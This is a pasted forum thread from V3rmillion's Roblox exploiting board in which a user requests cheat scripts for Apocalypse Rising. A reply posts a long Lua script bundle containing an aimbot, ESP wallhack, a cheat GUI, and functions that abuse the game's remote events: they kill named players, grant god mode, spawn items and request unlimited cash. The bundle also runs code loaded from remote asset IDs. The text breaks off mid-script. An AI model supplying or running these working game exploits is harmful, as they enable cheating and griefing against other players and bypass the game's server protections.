Advertisement
Guest User

Untitled

a guest
Dec 31st, 2016
3,450
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 110.11 KB | None | 0 0
  1.  
  2. V3rmillion
  3. Apocalypse Rising Scripts Request. - Printable Version
  4.  
  5. +- V3rmillion (https://v3rmillion.net)
  6. +-- Forum: Exploiting (https://v3rmillion.net/forumdisplay.php?fid=7)
  7. +--- Forum: Roblox (https://v3rmillion.net/forumdisplay.php?fid=10)
  8. +--- Thread: Apocalypse Rising Scripts Request. (/showthread.php?tid=92026)
  9.  
  10.  
  11. Apocalypse Rising Scripts Request. - Jack - 07-05-2016
  12.  
  13. I've been looking for some Script/Loadstrings for apocalypse rising. Everyone I ask treats me like an Asshole lol.. Anyways, I hope someone can supply me with a few. I don't care if they're leaked.
  14.  
  15. RE: Apocalypse Rising Scripts Request. - Frosty704Reborn - 07-05-2016
  16.  
  17. here u go homie http://pastebin.com/sJz1byWE
  18.  
  19. RE: Apocalypse Rising Scripts Request. - XxBillyTheNoscoperxX - 07-05-2016
  20.  
  21. Check my past like 10 threads
  22. your welcome bb
  23.  
  24. RE: Apocalypse Rising Scripts Request. - Jack - 07-05-2016
  25.  
  26. (07-05-2016, 06:14 PM)Frosty704Reborn Wrote: here u go homie http://pastebin.com/sJz1byWE
  27. What does that do?
  28.  
  29. RE: Apocalypse Rising Scripts Request. - XxBillyTheNoscoperxX - 07-05-2016
  30.  
  31. (07-05-2016, 06:19 PM)Jack Wrote:
  32. (07-05-2016, 06:14 PM)Frosty704Reborn Wrote: here u go homie http://pastebin.com/sJz1byWE
  33. What does that do?
  34.  
  35. just check out my threads <3 (I have more on the way)
  36.  
  37. RE: Apocalypse Rising Scripts Request. - Jack - 07-05-2016
  38.  
  39. (07-05-2016, 06:30 PM)XxBillyTheNoscoperxX Wrote:
  40. (07-05-2016, 06:19 PM)Jack Wrote:
  41. (07-05-2016, 06:14 PM)Frosty704Reborn Wrote: here u go homie http://pastebin.com/sJz1byWE
  42. What does that do?
  43.  
  44. just check out my threads <3 (I have more on the way)
  45. Ok
  46.  
  47. RE: Apocalypse Rising Scripts Request. - PancakeSloth - 07-05-2016
  48.  
  49. Code:
  50. function aimbot()
  51. --Aimbot
  52. print("Key to toggle esp is V.")
  53. print("Aim-key is Left-Alt.")
  54.  
  55. ENABLED = false
  56. PLAYER = game.Players.LocalPlayer
  57. MOUSE = PLAYER:GetMouse()
  58. CC = game.Workspace.CurrentCamera
  59. _G.FREE_FOR_ALL = true
  60. _G.BIND = 52
  61. _G.AIM_AT = 'Head'
  62. local player = game.Players.LocalPlayer
  63. local esp = false
  64. local track = false
  65.  
  66.  
  67.  
  68. function Create(base, team)
  69. local bb = Instance.new("BillboardGui",player.PlayerGui)
  70. bb.Adornee = base
  71. bb.ExtentsOffset = Vector3.new(0,1,0)
  72. bb.AlwaysOnTop = true
  73. bb.Size = UDim2.new(0,5,0,5)
  74. bb.StudsOffset = Vector3.new(0,1,0)
  75. bb.Name = "tracker"
  76. local frame = Instance.new("Frame",bb)
  77. frame.ZIndex = 10
  78. frame.BackgroundTransparency = 0.3
  79. frame.Size = UDim2.new(1,0,1,0)
  80. frame.Position = UDim2.new(0,0,0)
  81. frame.Transparency = 1
  82. local txtlbl = Instance.new("TextLabel",bb)
  83. txtlbl.ZIndex = 10
  84. txtlbl.Text = (string.upper(base.Parent.Name))
  85. txtlbl.BackgroundTransparency = 1
  86. txtlbl.Position = UDim2.new(0,0,0,-35)
  87. txtlbl.Size = UDim2.new(1,0,10,0)
  88. txtlbl.Font = "SourceSansBold"
  89. txtlbl.FontSize = "Size10"
  90. txtlbl.TextStrokeTransparency = 0.5
  91.  
  92. local txtlbl2 = Instance.new("TextLabel",bb)
  93. txtlbl2.ZIndex = 10
  94. txtlbl2.Text = (math.floor(base.Parent.Humanoid.Health*100)/100)
  95. txtlbl2.BackgroundTransparency = 1
  96. txtlbl2.Position = UDim2.new(0,0,0,-25)
  97. txtlbl2.Size = UDim2.new(1,0,10,0)
  98. txtlbl2.Font = "SourceSansBold"
  99. txtlbl2.FontSize = "Size10"
  100.  
  101. txtlbl2.TextStrokeTransparency = 0.5
  102. if team then
  103. txtlbl.TextColor3 = Color3.new(255,0,0)
  104. txtlbl2.TextColor3 = Color3.new(255,0,0)
  105. frame.BackgroundColor3 = Color3.new(255,0,0)
  106.  
  107. elseif base.Parent.Name == "friend" or base.Parent.Name == "friend2" then
  108. txtlbl.TextColor3 = Color3.new(0,255,0)
  109. txtlbl2.TextColor3 = Color3.new(0,255,0)
  110. frame.BackgroundColor3 = Color3.new(0,255,0)
  111. txtlbl.Text = "FRIEND"
  112. txtlbl.FontSize = "Size14"
  113. txtlbl2.FontSize = "Size14"
  114.  
  115.  
  116.  
  117. elseif base.Parent.Name == game.Players.LocalPlayer.Name then
  118. txtlbl2.Transparency = 1
  119. txtlbl.Transparency = 1
  120. frame.Transparency = 1
  121. else
  122. txtlbl.TextColor3 = Color3.new(255,0,0)
  123. txtlbl2.TextColor3 = Color3.new(255,0,0)
  124. frame.BackgroundColor3 = Color3.new(255,0,0)
  125.  
  126. end
  127. end
  128.  
  129.  
  130. function Find()
  131. Clear()
  132. track = true
  133. spawn(function()
  134. while wait() do
  135. if track then
  136. Clear()
  137. for _,v in pairs(game.Players:players()) do
  138.  
  139. if v.Character and v.Character.Head then
  140. Create(v.Character.Head, false)
  141. end
  142. end
  143. end
  144. end
  145. wait(1)
  146. end)
  147. end
  148. function Clear()
  149. for _,v in pairs(player.PlayerGui:children()) do
  150. if v.Name == "tracker" and v:isA("BillboardGui") then
  151. v:Destroy()
  152. end
  153. end
  154. end
  155. mouse=game.Players.LocalPlayer:GetMouse()
  156. mouse.keyDown:connect(function(key)
  157. if key == "v" then
  158. if not esp then
  159. Find()
  160. print("ESP ENABLED")
  161. esp = true
  162. else
  163. Clear()
  164. track = false
  165. print("ESP DISABLED")
  166. esp = false
  167. end
  168.  
  169.  
  170.  
  171.  
  172. end
  173.  
  174. end)
  175.  
  176.  
  177.  
  178.  
  179. --aimbot
  180.  
  181.  
  182. function GetNearestPlayerToMouse()
  183. local PLAYERS = {}
  184. local PLAYER_HOLD = {}
  185. local DISTANCES = {}
  186. for i, v in pairs(game.Players:GetPlayers()) do
  187. if v ~= PLAYER then
  188. table.insert(PLAYERS, v)
  189. end
  190. end
  191. for i, v in pairs(PLAYERS) do
  192. if _G.FREE_FOR_ALL == false then
  193. if v and (v.Character) ~= nil and v.TeamColor ~= PLAYER.TeamColor then
  194. local AIM = v.Character:FindFirstChild(_G.AIM_AT)
  195. if AIM ~= nil then
  196. local DISTANCE = (AIM.Position - game.Workspace.CurrentCamera.CoordinateFrame.p).magnitude
  197. local RAY = Ray.new(game.Workspace.CurrentCamera.CoordinateFrame.p, (MOUSE.Hit.p - CC.CoordinateFrame.p).unit * DISTANCE)
  198. local HIT,POS = game.Workspace:FindPartOnRay(RAY, game.Workspace)
  199. local DIFF = math.floor((POS - AIM.Position).magnitude)
  200. PLAYER_HOLD[v.Name .. i] = {}
  201. PLAYER_HOLD[v.Name .. i].dist = DISTANCE
  202. PLAYER_HOLD[v.Name .. i].plr = v
  203. PLAYER_HOLD[v.Name .. i].diff = DIFF
  204. table.insert(DISTANCES, DIFF)
  205. end
  206. end
  207. elseif _G.FREE_FOR_ALL == true then
  208. local AIM = v.Character:FindFirstChild(_G.AIM_AT)
  209. if AIM ~= nil then
  210. local DISTANCE = (AIM.Position - game.Workspace.CurrentCamera.CoordinateFrame.p).magnitude
  211. local RAY = Ray.new(game.Workspace.CurrentCamera.CoordinateFrame.p, (MOUSE.Hit.p - CC.CoordinateFrame.p).unit * DISTANCE)
  212. local HIT,POS = game.Workspace:FindPartOnRay(RAY, game.Workspace)
  213. local DIFF = math.floor((POS - AIM.Position).magnitude)
  214. PLAYER_HOLD[v.Name .. i] = {}
  215. PLAYER_HOLD[v.Name .. i].dist = DISTANCE
  216. PLAYER_HOLD[v.Name .. i].plr = v
  217. PLAYER_HOLD[v.Name .. i].diff = DIFF
  218. table.insert(DISTANCES, DIFF)
  219. end
  220. end
  221. end
  222.  
  223. if unpack(DISTANCES) == nil then
  224. return false
  225. end
  226.  
  227. local L_DISTANCE = math.floor(math.min(unpack(DISTANCES)))
  228. if L_DISTANCE > 20 then
  229. return false
  230. end
  231.  
  232. for i, v in pairs(PLAYER_HOLD) do
  233. if v.diff == L_DISTANCE then
  234. return v.plr
  235. end
  236. end
  237. return false
  238. end
  239.  
  240. local TRACK = false
  241.  
  242.  
  243. MOUSE.KeyDown:connect(function(KEY)
  244. KEY = KEY:lower():byte()
  245. if KEY == _G.BIND then
  246. ENABLED = true
  247. end
  248. end)
  249. MOUSE.KeyUp:connect(function(KEY)
  250. KEY = KEY:lower():byte()
  251. if KEY == _G.BIND then
  252. ENABLED = false
  253. end
  254. end)
  255.  
  256. game:GetService('RunService').RenderStepped:connect(function()
  257. if ENABLED then
  258. local TARGET = GetNearestPlayerToMouse()
  259. if TARGET.Name == "Whitelist kid here" or TARGET.Name == "second whitelist kid here" then
  260. else
  261.  
  262. if (TARGET ~= false) then
  263. local AIM = TARGET.Character:FindFirstChild(_G.AIM_AT)
  264. if AIM then
  265. CC.CoordinateFrame = CFrame.new(CC.CoordinateFrame.p, AIM.CFrame.p)
  266. end
  267. end
  268. end
  269. end
  270. end)
  271. end
  272. --Loadstrings
  273. function justice()
  274. --[[
  275. Justice v.2.1
  276. Created by RustehBusteh (Donald J Trump), thank's for using! :)
  277. --]]
  278.  
  279. --[[ VALUES ]]--
  280. VERSION = "2.1"
  281. --[[ SUPPORTED GAMES ]]--
  282. LasVegas = 163865146
  283. PhantomForces = 292439477
  284. ApocRisingReimagined = 237590657
  285. ApocRisingReborn = 237590761
  286. --EpicMiniGames = ""
  287. --[[ GAME DETECTOR ]] --
  288. if game.PlaceId == LasVegas then
  289. game_Supported = "YES"
  290. elseif game.PlaceId == PhantomForces then
  291. game_Supported = "YES"
  292. elseif game.PlaceId == ApocRisingReimagined then
  293. game_Supported = "YES"
  294. elseif game.PlaceId == ApocRisingReborn then
  295. game_Supported = "YES"
  296. --elseif game.PlaceId == EpicMiniGames then
  297. --game_Supported = "YES"
  298. else
  299. game_Supported = "NO"
  300. end
  301. Asset123 = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
  302. Game_name = Asset123.Name
  303. --[[ GUI CREATING ]]--
  304. game:GetObjects("rbxassetid://378228753")[1].Parent = game.CoreGui
  305. wait(1)
  306. --
  307. MainGui = game.CoreGui.JusticeGui.MainGui
  308. GameGui = game.CoreGui.JusticeGui.GameGui
  309. CustomGui = game.CoreGui.JusticeGui.CustomGui
  310. ApocGui = game.CoreGui.JusticeGui.ApocGui
  311. OpenGui = game.CoreGui.JusticeGui.Open
  312. -- NotSupportedGui = game.CoreGui.JusticeGui.NotSupported
  313. --[[ INVISIBLE AND VISIBLE GUI FUNCTIONS ]] --
  314. function make_gui_visible(Gui)
  315. Gui.Position = UDim2.new(.5,-200,.5,-100)
  316. Gui.Visible = true
  317. end
  318. function make_gui_invisible(Gui)
  319. Gui.Position = UDim2.new(999,999,999,999)
  320. Gui.Visible = false
  321. end
  322. make_gui_invisible(MainGui)
  323. make_gui_invisible(GameGui)
  324. make_gui_invisible(CustomGui)
  325. make_gui_invisible(ApocGui)
  326. OpenGui.Visible = false
  327. -- make_gui_invisible(NotSupportedGui)
  328. --[[ GUI EDITING ]]--
  329. -- WELCOME GUI
  330. MainGui.Welcome.Text = ("Welcome, " ..game.Players.LocalPlayer.Name.. "!")
  331. MainGui.Title.Text = ("Justice v." ..VERSION)
  332. MainGui.Game.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  333. MainGui.GameSupported.Text = ("Game Supported: " ..game_Supported)
  334. -- LOADING GUI
  335. GameGui.Game.Text = ("Welcome, " ..game.Players.LocalPlayer.Name.. "!")
  336. GameGui.Log1.Text = ""
  337. GameGui.Log2.Text = ""
  338. GameGui.Log3.Text = ""
  339. GameGui.Log4.Text = ""
  340. -- CUSTOM GUI
  341. CustomGui.Page1.Welcome.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  342. CustomGui.Page2.Welcome.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  343. CustomGui.Page1.Button1.Text = ""
  344. CustomGui.Page1.Button2.Text = ""
  345. CustomGui.Page1.Button3.Text = ""
  346. CustomGui.Page1.Button4.Text = ""
  347. CustomGui.Page1.Button5.Text = ""
  348. CustomGui.Page1.Button6.Text = ""
  349. CustomGui.Page1.Button7.Text = ""
  350. CustomGui.Page1.Button8.Text = ""
  351.  
  352. CustomGui.Page2.Button1.Text = ""
  353. CustomGui.Page2.Button2.Text = ""
  354. CustomGui.Page2.Button3.Text = ""
  355. CustomGui.Page2.Button4.Text = ""
  356. CustomGui.Page2.Button5.Text = ""
  357. CustomGui.Page2.Button6.Text = ""
  358. CustomGui.Page2.Button7.Text = ""
  359. CustomGui.Page2.Button8.Text = ""
  360. -- APOC GUI
  361. ApocGui.Page1.Welcome.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  362. ApocGui.Page2.Welcome.Text = ("Game: " ..Game_name.. " // ID: " ..game.PlaceId)
  363. ApocGui.Page1.Button1.Text = ""
  364. ApocGui.Page1.Button2.Text = ""
  365. ApocGui.Page1.Button3.Text = ""
  366. ApocGui.Page1.Button4.Text = ""
  367. ApocGui.Page1.Button5.Text = ""
  368. ApocGui.Page1.Button6.Text = ""
  369. ApocGui.Page1.Button7.Text = ""
  370. ApocGui.Page1.Button8.Text = ""
  371. ApocGui.Page1.Custom.Text = "LOCALPLAYER"
  372.  
  373. ApocGui.Page2.Button1.Text = ""
  374. ApocGui.Page2.Button2.Text = ""
  375. ApocGui.Page2.Button3.Text = ""
  376. ApocGui.Page2.Button4.Text = ""
  377. ApocGui.Page2.Button5.Text = ""
  378. ApocGui.Page2.Button6.Text = ""
  379. ApocGui.Page2.Custom.Text = "SERVER"
  380.  
  381. -- [[ OPEN GUI FUNCTIONS ]]--
  382. OpenGui.MouseButton1Down:connect(function()
  383. OpenGui.Visible = false
  384. wait(.2)
  385. if game.PlaceId == ApocRisingReimagined or game.PlaceId == ApocRisingReborn then
  386. make_gui_visible(ApocGui)
  387. else
  388. make_gui_visible(CustomGui)
  389. end
  390. end)
  391. -- [[ MAIN AND GAME FUNCTIONS ]] --
  392. function functionMain_Gui()
  393. make_gui_visible(MainGui)
  394. MainGui.Open.MouseButton1Down:connect(function()
  395. MainGui:Destroy()
  396. functionGame_Gui()
  397. end)
  398. MainGui.Close.MouseButton1Down:connect(function()
  399. game.CoreGui.JusticeGui:Destroy() -- rip
  400. end)
  401. end
  402. function functionGame_Gui()
  403. make_gui_visible(GameGui)
  404. GameGui.Close.Visible = false
  405. GameGui.Close.MouseButton1Down:connect(function()
  406. if game_Supported == "YES" then
  407. GameGui:Destroy()
  408. if game.PlaceId == ApocRisingReimagined or game.PlaceId == ApocRisingReborn then
  409. functionApocGui()
  410. else
  411. functionCustomGui()
  412. end
  413. else
  414. -- make_gui_visible(NotSupported)
  415. GameGui:Destroy()
  416. end
  417. end)
  418. if game_Supported == "YES" then
  419. wait(1)
  420. GameGui.Log1.Text = "Game supported!"
  421. wait(1)
  422. GameGui.Log1.Text = "Loaded custom commands!"
  423. GameGui.Log2.Text = "Game supported!"
  424. wait(1)
  425. GameGui.Close.Text = "CUSTOM COMMANDS"
  426. else
  427. wait(1)
  428. GameGui.Log1.Text = "Game not supported!"
  429. wait(1)
  430. end
  431. GameGui.Close.Visible = true
  432. end
  433. -- [[ CUSTOM GUI FUNCTIONS ]] --
  434. function functionCustomGui()
  435. make_gui_visible(CustomGui)
  436. CustomGui.Page1.Close.MouseButton1Down:connect(function()
  437. make_gui_invisible(CustomGui)
  438. wait(.2)
  439. OpenGui.Visible = true
  440. end)
  441. CustomGui.Page2.Close.MouseButton1Down:connect(function()
  442. make_gui_invisible(CustomGui)
  443. wait(.2)
  444. OpenGui.Visible = true
  445. end)
  446. CustomGui.Page1.Page.Visible = false
  447. CustomGui.Page2.Visible = false
  448. if game.PlaceId == LasVegas then
  449. CustomGui.Page1.Button1.Text = "Give 10 Million Cash"
  450. CustomGui.Page1.Button2.Text = ""
  451. CustomGui.Page1.Button3.Text = ""
  452. CustomGui.Page1.Button4.Text = ""
  453. CustomGui.Page1.Button5.Text = ""
  454. CustomGui.Page1.Button6.Text = ""
  455. CustomGui.Page1.Button7.Text = ""
  456. CustomGui.Page1.Button8.Text = ""
  457.  
  458. CustomGui.Page1.Button1.MouseButton1Down:connect(function()
  459. local CASH_AMOUNT = math.huge
  460. game.ReplicatedStorage.Events.MoneyRequest:FireServer(CASH_AMOUNT, 'Cash', true)
  461. end)
  462. elseif game.PlaceId == PhantomForces then
  463. CustomGui.Page1.Button1.Text = "Load PhantomX Gui"
  464. CustomGui.Page1.Button1.MouseButton1Down:connect(function()
  465. game:GetObjects('rbxassetid://311949717')[1].Parent = game.CoreGui
  466. local PhantomX = game.CoreGui:WaitForChild('PhantomX')
  467. local script = Instance.new('Script', game.CoreGui)
  468. script.Name = ''
  469. script.Source = PhantomX.CONTROL.Source
  470. loadstring(script.Source)()
  471. loadstring(game:GetObjects("rbxassetid://298918246")[1].Source)()
  472. end)
  473. --elseif game.PlaceId == EpicMiniGames then
  474. end
  475. end
  476. -- [[ APOCALYPSE RISING ]] --
  477. function LocalPlayerGod()
  478. _G.lpgod = true
  479. local ChangeProp = game.Lighting.Remote.ChangeProperty
  480. local Plr = game.Players.LocalPlayer
  481. while _G.lpgod == true and wait() do -- health hack
  482. ChangeProp:FireServer(Plr.Character.Humanoid, "Health", 100)
  483. end
  484. end
  485. function NoLocalPlayerGod()
  486. _G.lpgod = false
  487. end
  488. function UnlimitedHunger()
  489. _G.unlimhunger = true
  490. while _G.unlimhunger == true and wait(2) do
  491. game.Players.LocalPlayer.playerstats.Hunger.Value = 100
  492. end
  493. end
  494. function UnlimitedThirst()
  495. _G.unlimthirst = true
  496. while _G.unlimthirst == true and wait(2) do
  497. game.Players.LocalPlayer.playerstats.Thirst.Value = 100
  498. end
  499. end
  500. -- [[ APOCALYPSE GUI FUNCTIONS ]] --
  501. function functionApocGui()
  502. make_gui_visible(ApocGui)
  503. if game.PlaceId == ApocRisingReimagined or game.PlaceId == ApocRisingReborn then
  504. ApocGui.Page1.Visible = true
  505. ApocGui.Page2.Visible = false
  506. -- CLOSE
  507. ApocGui.Page1.Close.MouseButton1Down:connect(function()
  508. make_gui_invisible(ApocGui)
  509. wait(.2)
  510. OpenGui.Visible = true
  511. end)
  512. ApocGui.Page2.Close.MouseButton1Down:connect(function()
  513. make_gui_invisible(ApocGui)
  514. wait(.2)
  515. OpenGui.Visible = true
  516. end)
  517. -- NEXT/BACK
  518. ApocGui.Page1.Page.Text = "NEXT"
  519. ApocGui.Page1.Page.MouseButton1Down:connect(function()
  520. ApocGui.Page1.Visible = false
  521. ApocGui.Page2.Visible = true
  522. end)
  523. ApocGui.Page2.Page.Text = "BACK"
  524. ApocGui.Page2.Page.MouseButton1Down:connect(function()
  525. ApocGui.Page1.Visible = true
  526. ApocGui.Page2.Visible = false
  527. end)
  528. ApocGui.Page1.Button1.Text = "SEMI-GOD"
  529. ApocGui.Page1.Button2.Text = "UNSEMI-GOD"
  530. ApocGui.Page1.Button3.Text = "UNLIMITED HUNGER"
  531. ApocGui.Page1.Button4.Text = "UNLIMITED THIRST"
  532. ApocGui.Page1.Button5.Text = "MK 17 KIT"
  533. ApocGui.Page1.Button6.Text = "G36K KIT"
  534. ApocGui.Page1.Button7.Text = "FAL KIT"
  535. ApocGui.Page1.Button8.Text = "CAR REPAIR KIT"
  536.  
  537. ApocGui.Page2.Button1.Text = "SEMI-GOD"
  538. ApocGui.Page2.Button2.Text = "N/A"
  539. ApocGui.Page2.Button3.Text = "KILL"
  540. ApocGui.Page2.Button4.Text = "N/A"
  541. ApocGui.Page2.Button5.Text = "GOTO(WIP)"
  542. ApocGui.Page2.Button6.Text = "BRING(WIP)"
  543.  
  544. ApocGui.Page1.Button1.MouseButton1Down:connect(function()
  545. LocalPlayerGod()
  546. print("lp godded")
  547. end)
  548. ApocGui.Page1.Button2.MouseButton1Down:connect(function()
  549. NoLocalPlayerGod()
  550. print("lp ungodded")
  551. end)
  552. ApocGui.Page1.Button3.MouseButton1Down:connect(function()
  553. UnlimitedHunger()
  554. print("unlimited hunger")
  555. end)
  556. ApocGui.Page1.Button4.MouseButton1Down:connect(function()
  557. UnlimitedThirst()
  558. print "unlimited thirst"
  559. end)
  560. ApocGui.Page1.Button5.MouseButton1Down:connect(function()
  561. local function s(n)
  562. local new = game.Lighting.LootDrops[n]:Clone()
  563. new.Parent = workspace
  564. new:MoveTo(game.Players.LocalPlayer.Character.Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  565. end
  566. t ={"ACOG","Mk 17","Compass","CBJ-MS","TEC9Ammo32","TEC9Ammo32","Sabre","MilitaryPackBlack","Binoculars","Detonator","Suppressor9","Suppressor762","Grip","Reflex","GPS","Map","C4","C4","Entrencher","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50"}
  567. for i = 1, #t do
  568. s(t[i])
  569. end
  570. print "mk 17 kit"
  571. end)
  572. ApocGui.Page1.Button6.MouseButton1Down:connect(function()
  573. local function AA(BB)
  574. local new = game.Lighting.LootDrops[BB]:Clone()
  575. new.Parent = workspace
  576. new:MoveTo(game.Players.LocalPlayer.Character.Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  577. end
  578. CC ={"ACOG","G36K","Compass","CBJ-MS","TEC9Ammo32","TEC9Ammo32","Sabre","MilitaryPackBlack","Binoculars","Detonator","Suppressor9","Suppressor556","Grip","Reflex","GPS","Map","C4","C4","Entrencher","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100",}
  579. for DD = 1, #CC do
  580. AA(CC[DD])
  581. end
  582. end)
  583. ApocGui.Page1.Button7.MouseButton1Down:connect(function()
  584. local function Ab(Ac)
  585. local new = game.Lighting.LootDrops[Ac]:Clone()
  586. new.Parent = workspace
  587. new:MoveTo(game.Players.LocalPlayer.Character.Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  588. end
  589. Aa ={"ACOG","FAL","Compass","CBJ-MS","TEC9Ammo32","TEC9Ammo32","Sabre","MilitaryPackBlack","Binoculars","Detonator","Suppressor9","Suppressor762","Grip","Reflex","GPS","Map","C4","C4","Entrencher","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50"}
  590. for Ad = 1, #Aa do
  591. Ab(Aa[Ad])
  592. end
  593. end)
  594. ApocGui.Page1.Button8.MouseButton1Down:connect(function()
  595. local function Bc(Bb)
  596. local new = game.Lighting.LootDrops[Bb]:Clone()
  597. new.Parent = workspace
  598. new:MoveTo(game.Players.LocalPlayer.Character.Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  599. end
  600. Tt ={"ReinforcedWheel","ReinforcedWheel","ReinforcedWheel","ReinforcedWheel","ReinforcedWheel","ReinforcedWheel","BallisticGlass","ArmorPlates","FuelTank","EngineParts","ScrapMetal","JerryCan","JerryCan"}
  601. for cC = 1, #Tt do
  602. Bc(Tt[cC])
  603. end
  604. end)
  605.  
  606. ApocGui.Page2.Username.Text = "Username (Exact)"
  607.  
  608.  
  609. ApocGui.Page2.Button1.MouseButton1Down:connect(function()
  610. local input = ApocGui.Page2.Username.Text
  611. playr = game.Players:FindFirstChild(input,true)
  612. while wait() do
  613. game.Lighting.Remote.ChangeProperty:FireServer(playr.Character.Humanoid, "Health", 100)
  614. end
  615. end)
  616. ApocGui.Page2.Button2.MouseButton1Down:connect(function()
  617. print("n/a")
  618. end)
  619. ApocGui.Page2.Button3.MouseButton1Down:connect(function()
  620. local input = ApocGui.Page2.Username.Text
  621. playr = game.Players:FindFirstChild(input,true)
  622. game.Lighting.Remote.AddDamage:FireServer(playr.Character.Humanoid,100)
  623. end)
  624. ApocGui.Page2.Button4.MouseButton1Down:connect(function()
  625.  
  626. end)
  627. ApocGui.Page2.Button5.MouseButton1Down:connect(function()
  628.  
  629. end)
  630. ApocGui.Page2.Button6.MouseButton1Down:connect(function()
  631.  
  632. end)
  633.  
  634. end
  635. end
  636. -- [[ RUN ]] --
  637. functionMain_Gui()
  638.  
  639.  
  640.  
  641. end
  642.  
  643. function spawner()
  644. wait(1)
  645. print("Version 3.1")
  646. game:GetObjects("rbxassetid://421423214")[1].Parent = game.CoreGui
  647. wait(1)
  648. local GUI = game.CoreGui.ApocGui.BackgroundFrame.DragFrame.Main.BackgroundFrame.Vals
  649.  
  650.  
  651. GUI.Spawn.MouseButton1Down:connect(function()
  652. local Text1 = GUI:FindFirstChild("Username").Text
  653. local Text2 = GUI:FindFirstChild("SlotNumber").Text
  654. local Text3 = GUI:FindFirstChild("ItemID").Text
  655. local Player = game.Players:FindFirstChild(Text1, true)
  656. local SlotNumber = "slot" .. Text2
  657. local ItemId = tonumber(Text3)
  658.  
  659. if ItemId == 4016 then
  660. game.Lighting.Remote.AddObject:FireServer(Player.playerstats.slots.slotbackpack, 4016)
  661. print("Backpack Spawned")
  662. else
  663. game.Lighting.Remote.AddObject:FireServer(Player.playerstats.slots:FindFirstChild(SlotNumber), ItemId)
  664. print("Item Spawned")
  665. end
  666. -- game.Lighting.Remote.AddObject:FireServer(game.Players.LocalPlayer.playerstats.slots.slot1, 53)
  667. end)
  668.  
  669.  
  670.  
  671.  
  672. -- loadstring(game:GetObjects("rbxassetid://386866428")[1].Source)()
  673. -- http://www.roblox.com/item.aspx?id=386713473
  674. --Loader-- http://www.roblox.com/item.aspx?id=386866428
  675. --game.Lighting.Remove.AddObject:FireServer(Player.playerstats.slots:FindFirstChild("slotbackpack"), ItemId)
  676.  
  677. end
  678.  
  679. function secondgod()
  680. if game.CoreGui:FindFirstChild('APOC') then
  681. game.CoreGui.APOC:Destroy()
  682. end
  683.  
  684. game:GetObjects('rbxassetid://291330215')[1].Parent = game.CoreGui
  685.  
  686. wait(0.1)
  687.  
  688. local Player = game.Players.LocalPlayer
  689.  
  690. local apocGUI = game.CoreGui.APOC
  691. local MAIN = apocGUI.MAIN
  692.  
  693. local Open = apocGUI.Open
  694. local Exit = MAIN.Exit
  695.  
  696. Open:TweenPosition(UDim2.new(0,0,0,380), 'InOut', 'Quad', 0.5, true)
  697.  
  698. local Clip = true
  699. local ESP = false
  700. local Floating = false
  701. local Stamina = false
  702. local BoostReady = true
  703. local GodMode = false
  704.  
  705. -- Open and Exit --
  706.  
  707. Open.MouseButton1Down:connect(function()
  708. Open.Active = false
  709. Exit.Active = true
  710. Open:TweenPosition(UDim2.new(0,-30,0,380), 'InOut', 'Quad', 0.5, true)
  711. MAIN:TweenPosition(UDim2.new(0,10,0,420), 'InOut', 'Quad', 0.5, true)
  712. end)
  713.  
  714. Exit.MouseButton1Down:connect(function()
  715. Open.Active = true
  716. Exit.Active = false
  717. Open:TweenPosition(UDim2.new(0,0,0,380), 'InOut', 'Quad', 0.5, true)
  718. MAIN:TweenPosition(UDim2.new(0,-230,0,420), 'InOut', 'Quad', 0.5, true)
  719. end)
  720.  
  721. -- ESP --
  722.  
  723. local track = false
  724.  
  725. function Create(base, team)
  726. local espMAIN = apocGUI.ESP:Clone()
  727. local F = espMAIN.DOT
  728.  
  729. espMAIN.Parent = Player.PlayerGui
  730. espMAIN.Adornee = base
  731.  
  732. F.Visible = true
  733. end
  734.  
  735. function Clear()
  736. for _,v in pairs(Player.PlayerGui:children()) do
  737. if v.Name == "ESP" and v:IsA("BillboardGui") then
  738. v:Destroy()
  739. end
  740. end
  741. end
  742.  
  743. function Find()
  744. Clear()
  745. track = true
  746. spawn(function()
  747. while wait() do
  748. if track then
  749. Clear()
  750. for i,v in pairs(game.Players:players()) do
  751. if v.Character and v.Character.Head then
  752. Create(v.Character.Head, true)
  753. end
  754. end
  755. end
  756. wait(1)
  757. end
  758. end)
  759. end
  760.  
  761. -- Night Vision --
  762.  
  763. function NightVision()
  764. local nvGUI = Instance.new('ScreenGui', Player.PlayerGui)
  765. nvGUI.Name = 'NightVision'
  766. local nvMAIN = Instance.new('TextLabel', nvGUI)
  767. nvMAIN.Name = 'MAIN'
  768. nvMAIN.BackgroundColor = BrickColor.new(0,1,0)
  769. nvMAIN.BackgroundTransparency = 0.75
  770. nvMAIN.BorderSizePixel = 0
  771. nvMAIN.Size = UDim2.new(1,0,1,0)
  772. nvMAIN.Text = ''
  773.  
  774. for i,v in pairs(game.Players:GetChildren()) do
  775. if v and v.Character and not (v.Name == '' .. Player.Name) then
  776. for i,v in pairs(v.Character:GetChildren()) do
  777. if v:IsA('BasePart') then
  778. local nvBox = Instance.new('SelectionBox', nvMAIN)
  779. nvBox.Adornee = v
  780. nvBox.Color = BrickColor.new('Lime green')
  781. end
  782. end
  783. end
  784. end
  785. end
  786.  
  787. -- Main Functions --
  788.  
  789. -- NoClip --
  790.  
  791. MAIN.NoClip.MouseButton1Down:connect(function()
  792. MAIN.NoClip.Visible = false
  793. MAIN.Clip.Visible = true
